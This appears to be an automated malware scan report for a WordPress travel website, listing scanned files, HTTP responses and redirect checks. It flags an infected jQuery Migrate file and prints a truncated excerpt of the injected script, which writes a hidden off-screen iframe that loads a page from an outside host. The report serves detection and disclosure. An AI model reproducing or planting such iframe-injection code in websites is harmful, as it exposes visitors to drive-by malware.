Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tobaccoroadtravel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tobaccoroadtravel.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Tue, 16 Sep 2014 15:03:18 GMT Pragma: no-cache Location: http://tobaccoroadtravel.com/ Server: Microsoft-IIS/7.5 Content-Length: 152 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=68idfh4niahpn9ve83gnjk6bs1; path=/ X-Pingback: http://tobaccoroadtravel.com/xmlrpc.php X-Powered-By: PHP/5.3.27 X-Powered-By: ASP.NET | clean |
http://tobaccoroadtravel.com/ | 200 OK Content-Length: 59778 Content-Type: text/html | clean |
http://tobaccoroadtravel.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96869 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8262 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.com/ifituterasie16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75% Antivirus reports:
| ||
http://tobaccoroadtravel.com/wp-content/plugins/images-thumbnail-sliderv1/js/jc.js?ver=4.0 | 200 OK Content-Length: 15691 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/jquery.cycle.all.min.js | 200 OK Content-Length: 34844 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/jquery.easing.1.3.js | 200 OK Content-Length: 9159 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/superfish.js | 200 OK Content-Length: 4776 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 1819 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/CTF_kodda_menu/core/../standard/js/frontend.min.js?ver=1.2.3 | 200 OK Content-Length: 36195 Content-Type: application/x-javascript | clean |
http://www.tobaccoroadtravel.com/quote-your-trip | 200 OK Content-Length: 43239 Content-Type: text/html | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0 | 200 OK Content-Length: 33 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0 | 200 OK Content-Length: 24995 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0 | 200 OK Content-Length: 5337 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0 | 200 OK Content-Length: 891 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 16 Sep 2014 15:03:18 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Content-Length: 59778
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://tobaccoroadtravel.com/>; rel=shortlink
Set-Cookie: PHPSESSID=t9i5tcbti5uj6j066n8a1559s0; path=/
X-Pingback: http://tobaccoroadtravel.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
X-Powered-By: ASP.NET
...59778 bytes of data.
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 16 Sep 2014 15:03:18 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Content-Length: 59778
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://tobaccoroadtravel.com/>; rel=shortlink
Set-Cookie: PHPSESSID=t9i5tcbti5uj6j066n8a1559s0; path=/
X-Pingback: http://tobaccoroadtravel.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
X-Powered-By: ASP.NET
...59778 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Referer: http://www.google.com/search?q=tobaccoroadtravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Referer: http://www.google.com/search?q=tobaccoroadtravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.